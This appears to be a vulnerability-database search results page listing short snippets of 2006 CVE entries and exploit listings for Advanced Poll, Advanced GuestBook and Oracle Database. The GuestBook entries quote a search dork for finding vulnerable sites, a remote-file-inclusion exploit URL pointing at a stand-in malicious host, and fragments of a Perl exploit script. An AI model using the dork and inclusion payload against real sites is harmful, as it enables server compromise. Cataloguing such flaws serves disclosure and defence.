9763 matches found
CVE-2006-2131
include/class_poll.php in Advanced Poll 2.0.4 uses the HTTP_X_FORWARDED_FOR (X-Forwarded-For) HTTP header to identify the IP address of a client, which makes it easier for remote attackers to spoof the source IP and bypass voting restrictions...
CVE-2006-2130
SQL injection vulnerability in include/class_poll.php in Advanced Poll 2.0.4 allows remote attackers to execute arbitrary SQL commands via the User-Agent HTTP header...
CVE-2006-2130
The CVE-2006-2130 entry concerns a SQL injection vulnerability in Advanced Poll 2.0.4, exploitable through the User-Agent HTTP header in include/class_poll.php. The connected documents confirm affected software and the root cause is improper handling of User-Agent data, enabling remote attackers ...
CVE-2006-2131
The CVE-2006-2131 entry concerns Advanced Poll 2.0.4, where include/class_poll.php uses the HTTP_X_FORWARDED_FOR header to identify the client IP. The root cause is relying on X-Forwarded-For for IP checks, which allows remote attackers to spoof the source IP and bypass voting restrictions. The a...
Advanced Guestbook 2.x - Addentry.php Remote File Inclusion
Advanced Guestbook 2.x - Addentry.php Remote File Inclusion source: https://www.securityfocus.com/bid/17745/info Advanced GuestBook for phpBB is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker ca...
Advanced GuestBook <= 2.4.0 (phpBB) Remote File Inclusion Exploit
Exploit for unknown platform in category web applications. Advanced GuestBook if @ARGV ne 3 else sub header print "+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n"; print "+ Advanced GuestBook for...
Advanced GuestBook <= 2.4.0 (phpBB) File Inclusion Vulnerability
No description provided by source. Title: Advanced GuestBook for phpBB <= 2.4.0 Remote File Inclusion Dork: inurl:guestbook.php "Advanced GuestBook" "powered by phpbb" Credits: Oo Exploit: http://url/phpbbpath/admin/addentry.php?phpbbrootpath=http://badscript? milw0rm.com 2006-04-28...
Advanced GuestBook <= 2.4.0 (phpBB) File Inclusion Vulnerability
Exploit for unknown platform in category web applications. Advanced GuestBook <= 2.4.0 phpBB File Inclusion Vulnerability. Title: Advanced GuestBook for phpBB <= 2.4.0...
Advanced Guestbook 2.4.0 - phpBB Remote File Inclusion
Advanced Guestbook 2.4.0 - phpBB Remote File Inclusion !usr/bin/perl use LWP::UserAgent; Bug Found by Oo Exploit coded by n0m3rcy Copyright c 2006 [email protected] Gr33tz; nukedx , Devil-00 , str0ke , cijfer Usage; n0ag.pl if @ARGV ne 3 else sub header print...
Advanced Guestbook 2.4.0 - 'phpBB' Remote File Inclusion
!usr/bin/perl use LWP::UserAgent; Bug Found by Oo Exploit coded by n0m3rcy Copyright c 2006 [email protected] Gr33tz; nukedx , Devil-00 , str0ke , cijfer Usage; n0ag.pl if @ARGV ne 3 else sub header print "+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n"; pri...
Advanced Guestbook 2.4.0 - 'phpBB' File Inclusion
Title: Advanced GuestBook for phpBB <= 2.4.0 Remote File Inclusion Dork: inurl:guestbook.php "Advanced GuestBook" "powered by phpbb" Credits: Oo Exploit: http://url/phpbbpath/admin/addentry.php?phpbbrootpath=http://badscript? milw0rm.com 2006-04-28...
SQL injection
Multiple unspecified vulnerabilities in Oracle Database Server 8.1.7.4, 9.0.1.5, 9.2.0.7, 10.1.0.5, and other versions have unknown impact and attack vectors in the (1) Advanced Replication component, as identified by Vuln DB01, and (2) Oracle Spatial component, as identified by Vuln DB10. NOTE:...
Design/Logic Flaw
Unspecified vulnerability in Oracle Database Server 9.2.0.6 has unknown impact and attack vectors in the Advanced Replication component, aka Vuln DB02...
Buffer overflow
Buffer overflow in the Advanced Replication component in Oracle Database Server 10.1.0.4 allows database users to execute arbitrary code via the VERIFY_LOG procedure of the DBMS_SNAPSHOT_UTL package, aka Vuln DB03...
CVE-2006-1868
Buffer overflow in the Advanced Replication component in Oracle Database Server 10.1.0.4 allows database users to execute arbitrary code via the VERIFY_LOG procedure of the DBMS_SNAPSHOT_UTL package, aka Vuln DB03...
CVE-2006-1867
Unspecified vulnerability in Oracle Database Server 9.2.0.6 has unknown impact and attack vectors in the Advanced Replication component, aka Vuln DB02...
CVE-2006-1866
Multiple unspecified vulnerabilities in Oracle Database Server 8.1.7.4, 9.0.1.5, 9.2.0.7, 10.1.0.5, and other versions have unknown impact and attack vectors in the (1) Advanced Replication component, as identified by Vuln DB01, and (2) Oracle Spatial component, as identified by Vuln DB10. NOTE:...
CVE-2006-1866
CVE-2006-1866 affects Oracle Database Server 8.1.7.4, 9.0.1.5, 9.2.0.7, 10.1.0.5 and other versions, with unknown impact/attack vectors in (1) Advanced Replication (DB01) and (2) Oracle Spatial (DB10). Oracle reportedly did not publicly disclose details as of 20060421, but claims exist that DB01 ...